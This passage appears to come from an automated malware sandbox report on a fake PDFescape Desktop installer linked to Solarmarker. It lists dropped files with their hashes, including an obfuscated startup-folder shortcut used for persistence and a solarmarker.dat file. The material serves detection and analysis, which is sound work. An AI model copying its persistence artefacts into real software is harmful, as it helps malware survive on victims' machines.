        • C:\Program Files\PDFescape Desktop\context-menu.dll
        • C:\Program Files\PDFescape Desktop\encoding-conversion.dll
        • C:\Program Files\PDFescape Desktop\libcurl.dll
        • C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dll
        • C:\Program Files\PDFescape Desktop\pdfcore.dll
        • C:\Program Files\PDFescape Desktop\pdfgraphics.dll
        • C:\Program Files\PDFescape Desktop\pdfview.dll
        • C:\Program Files\PDFescape Desktop\preview-handler.dll
        • C:\Program Files\PDFescape Desktop\root-service-provider.dll
          MD5

          58c639f842629bf97596add29b0ad19c

          SHA1

          059b152148a8fb92f9b8f119fa95608240ea2957

          SHA256

          40b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503

          SHA512

          f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a

        • C:\Program Files\PDFescape Desktop\thumbnail-handler.dll
          MD5

          5c467cd8042003e71597dccb53a03bfb

          SHA1

          134db7349cfc485ee5f32b9583210843e02acdda

          SHA256

          2f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85

          SHA512

          b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99

        • C:\Program Files\PDFescape Desktop\ws.exe
          MD5

          c86fef0f4c86065fda9368fe5a1043d0

          SHA1

          9c858857549675608c933b980d2f74c0ffaaa769

          SHA256

          f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65

          SHA512

          4674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812

        • C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
          MD5

          87d28b3d2df1cab3711bf8d3b5b520c2

          SHA1

          1987a4bf2a37f6538c701461357a52b0bce1b980

          SHA256

          88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

          SHA512

          19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

        • C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll
          MD5

          e5a591c125fdf21381cf543ed7706c66

          SHA1

          0baad9f119616ce5d0d39d4cdc9c884c1002a24e

          SHA256

          15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

          SHA512

          20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

        • C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msi
          MD5

          692a85c10d2e69d290a14aef95aae86f

          SHA1

          381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1

          SHA256

          65f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d

          SHA512

          38a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5
          MD5

          0dd2832c3de67e2bd6bbc2061308c7f3

          SHA1

          e9486e3de283b08b094556f91e81bd17d7e25be2

          SHA256

          a55858addebe5c10572a0056b6fe4cee19ea392d41647d408d0d275bc5697f3a

          SHA512

          31c771ebfbc697f604397a46ceecea1226cfa7c3b17817458c770b95481bbbcc571f3b58a0adca75466e2ed466f9d91a14c40b3963a34b95fb1b9715aaf9074b

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299
          MD5

          ae95e79229dc82d4ab535d5b74fd6ce9

          SHA1

          96f9949f4878dd59781e9edfe58793cebc068c4b

          SHA256

          0d7ca357ae030152e06e327ffce34335b9bbb019f74a1e0637ca4f2ed4a36ed3

          SHA512

          b86c685eb27972c388ebadfb1c1926abe898226c5cfa353098911d0aad8979f234984ffe8e07abdfeb80def95466f4e76d2d6aab22ecdfca41e14b39e65f83fc

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5
          MD5

          658932b90137ac6ca0e096769777e115

          SHA1

          72dc37134a70cefbf803351331bb68a422834c8e

          SHA256

          cb0c49a84874d0963ec43c19c0d3adddc0c3789fe01da00f3ff30c2341c5b8e9

          SHA512

          ae7bbc5e638b7e023e687ba13791f3cca9264794567667b8db484993978e6c800a70441a427573ae7cb91af081d2f1d8357729eed928f3a23882612fda9caabc

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299
          MD5

          bf4566680139f0ee845f1381368947cb

          SHA1

          cf283c4533070753dd71e31a91d21fa8543f157e

          SHA256

          4de8549a851c54ef0cdea39aaccd2ea87e40084815cec2d6fd871d664d20ca92

          SHA512

          3be487bdb5b58b65ed8587c462a80181774b6c3d9378f78c0a612c453c845d502fe86f7aa7477211923e2f62b889494e919bd38ea6577924eb11b460c19fda47

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp
          MD5

          0dc8e93706ff1b10cd6d60ab0ec15d88

          SHA1

          9e9c66127ba35ca4ee66fb3fa8820a683d4c943e

          SHA256

          3b79aab07b9461a9d4f3c579555ee024888abcda4f5cc23eac5236a56bf740c7

          SHA512

          0dbbd64f27055997279e36254ba2515b3672b41ef037777fd7490c0d0fa22f791934b483d281a33e542d9f5ee48bac73f2817e1dd93b0e3484c4c5653c8dbf66

        • C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe
          MD5

          87d28b3d2df1cab3711bf8d3b5b520c2

          SHA1

          1987a4bf2a37f6538c701461357a52b0bce1b980

          SHA256

          88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

          SHA512

          19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          e1e3519302ca4dabf79abd88d7912e7a

          SHA1

          94efdff60edb157267eaa3acd3267568ab7ea769

          SHA256

          3fd4de0e749ccd33447957c9330d0fe9e349fe654b9933522a657bc95766c1ba

          SHA512

          03879c53e8ddd4e1c78624e7a0824ee190cff5b3f47162228b503d04268522a290e668d67f46578f46c4b6c56636f98ec185b065b0d527826516db7fe80289ea

        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          075847bbbcd951286905ee7185b4428b

          SHA1

          2a383a14fba21ba931e9d032e0ff81bb8c5e7a08

          SHA256

          0ce78bd25d8df577dad184e2be7a40b58eb2925080d3497b351629a978bd8916

          SHA512

          d57d99cc938737e1b4bcca70320af29d7ed961816155fac0ffe422f003153c7a67f7a7d9c9cf8aae122983b26f63358a3998607df148a4cc4581742a3d449bee

        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          99b0c886e5700b6b843fa0d8979f0604

          SHA1

          d730661df7ec0eabec18b07c13433063f0e2048a

          SHA256

          9913fb9153d6ad9ef836ee0f48b1b17f1e535a22ab7774da6eb62220ed278d97

          SHA512

          4fecf15b5f03e482adbb574af9b31135304e594d7a4ffbd169c03051b7122416ba13c887309f30c2ca0896444c6579e8de9f4d7c6e27896541d0c85ba0893c84

        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          e26d9ece8d85162d7921e151f52dae07

          SHA1

          d75e501ffe9af536b6a9bf2fdd6c42e7c1261b7a

          SHA256

          57dafed76785661fbd2bebeb04ecdb1501997734f0b6a269f5a8e6d59b6006db

          SHA512

          4ad656e5f93f8ff6b486fde74b8203bcf7dfdfc2d9e84ac57ede16f4a7233269cdfb5a03ed35d4327e73f6cfa0d9e82185a5a106a536c225a90300d223943c1d

        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          0401ce3540201bd91bd08f80246d10c9

          SHA1

          51ef2ce98b354aabd11381a5b42ebcd8e6a30c8b

          SHA256

          a351329439cc6ac171e05ad07356fb87c00b4bfcc15aa735ac120055b714da74

          SHA512

          314276a70f351ecbd8e330a270624367ef702696c6673a285bb87cba9a972b0ed0a5f275cc842d4c9bde005ec05d2cdef48ad02a8033b87a33e6618e46c79169

        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          340d27b63fafc4049fff324e72668717

          SHA1

          95811f67c2bfbcf28ca24c36f68b2cfdeab1511d

          SHA256

          530a2467c97d94a1b5c053432f83ce74d64d30590f8188376e5304ba8cee2042

          SHA512

          0fdd5271a3814496dd6c72b1291b27baa51f825cd5687362477d1e4c7984daac744a6e628dee2ebb94125793b1e1e182255f75e92a037309cfb7efeff8275bf7

        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          2be12208707f97a3075dd24297a68444

          SHA1

          67b368397c4bc370db25d584b2ead03c15dca389

          SHA256

          6dc9f217d76c10c1d9c319a3a831b255ca68d088b96ae2d269a6806d99685d3d

          SHA512

          01d27d24173720e3c5d0bd0b7a6351abaf6a57a3f513912e9a906c92509a4df4effab613661e9254188c246a128197f561ae72bca373865eab7e1da27d61f24c

        • C:\Users\Admin\appdata\roaming\solarmarker.dat
          MD5

          821bd77ad1baa30c3f824594b2896476

          SHA1

          1e59c4dc0b698f526649342257cddaf19e1585c7

          SHA256

          83d3d260ecfbf9aad34ce0f019937948269c6c7dcbfc39512a40bf4ee3a743f1

          SHA512

          e2a053ecd89cb986f2f52d11794b6e0d9e63e6756fb421fb21b38f4e3272cbf12c4a2a76b861ae5786235fa3716ddce1001c17a37326c8a690e8021211f1ec3e

        • C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b
          MD5

          f49af433f9076c15cab2d858be35b939

          SHA1

          19fb76407184356e82560714f225a323ec19abc9

          SHA256

          c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154

          SHA512

          89163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c

        • \Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll
          MD5

          a733c1f89219252497e94cbc66272478

          SHA1

          f5f9be9a2345f6dc0414c3b62b4087faa32ce351

          SHA256

          557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547

          SHA512

          875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd

        • \Program Files\PDFescape Desktop\atom.dll
          MD5

          9148f07e6dedce3e8e6a642fba0402d8

          SHA1

          2e403f6b65bf4519d0883ebb0025d77130105a1c

          SHA256

          35bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a

          SHA512

          8f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb

        • \Program Files\PDFescape Desktop\brand.dll
          MD5

          594a3e3adcf139e7b20eddd1f16131d3

          SHA1

          7700c89b10e779fc6db72b42be0a81fe89378f9a

          SHA256

          52163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad

          SHA512

          d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc

        • \Program Files\PDFescape Desktop\context-menu.dll
          MD5

          2c9f26866787b200996d99ad160be2b2

          SHA1

          fec80f5b4a6acf29f74a2bc8918298518a487597

          SHA256

          4e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57

          SHA512

          9ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd

        • \Program Files\PDFescape Desktop\encoding-conversion.dll
          MD5

          448a6de619faf0f403c897b142f619c5

          SHA1

          e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2

          SHA256

          00a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51

          SHA512

          f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d

        • \Program Files\PDFescape Desktop\libcurl.dll
          MD5

          140cdda2f51d89dc194a8b8c3ab9e463

          SHA1

          255180975a70d00d31d516ecc895e42fd18c24bf

          SHA256

          a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15

          SHA512

          5065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4

        • \Program Files\PDFescape Desktop\libssl-1_1-x64.dll
          MD5

          62dc606e7f85f8f15a582a045e394d19

          SHA1

          bad647ebb9207e2b20d464c6b420c84b971519d2

          SHA256

          7a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411

          SHA512

          d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f

        • \Program Files\PDFescape Desktop\pdfcore.dll
          MD5

          c10d1adf13c2edde02e6adf49d1c900b

          SHA1

          4455fc9f229dedf4dd5622e6675c7a03ac8bd4d6

          SHA256

          6e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44

          SHA512

          0768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe

        • \Program Files\PDFescape Desktop\pdfgraphics.dll
          MD5

          1fc38631bf08eff07e8466f69ce90a46

          SHA1

          3973584e1371dfb26ae31cb4b555c972bd30f5a4

          SHA256

          78c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89

          SHA512

          5818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db

        • \Program Files\PDFescape Desktop\pdfview.dll
          MD5

          40ca796430abed5d369f0781af26481e

          SHA1

          49abef703e2c9c70e691d8971505691402c2e745

          SHA256

          e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19

          SHA512

          38a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8

        • \Program Files\PDFescape Desktop\preview-handler.dll
          MD5

          0a58eba4b339c0bb6f44a314ee06d7c7

          SHA1

          136b337a2c80fce2e4c0732fe5c821d58aad7d40

          SHA256

          32dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a

          SHA512

          18d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85

        • \Program Files\PDFescape Desktop\root-service-provider.dll
          MD5

          58c639f842629bf97596add29b0ad19c

          SHA1

          059b152148a8fb92f9b8f119fa95608240ea2957

          SHA256

          40b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503

          SHA512

          f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a

        • \Program Files\PDFescape Desktop\thumbnail-handler.dll
          MD5

          5c467cd8042003e71597dccb53a03bfb

          SHA1

          134db7349cfc485ee5f32b9583210843e02acdda

          SHA256

          2f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85

          SHA512

          b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99

        • \ProgramData\PDFescape Desktop\Installation\Statistics.dll
          MD5

          e5a591c125fdf21381cf543ed7706c66

          SHA1

          0baad9f119616ce5d0d39d4cdc9c884c1002a24e

          SHA256

          15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

          SHA512

          20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

        • \Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\_isetup\_isdecmp.dll
          MD5

          c6ae924ad02500284f7e4efa11fa7cfc

          SHA1

          2a7770b473b0a7dc9a331d017297ff5af400fed8

          SHA256

          31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

          SHA512

          f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
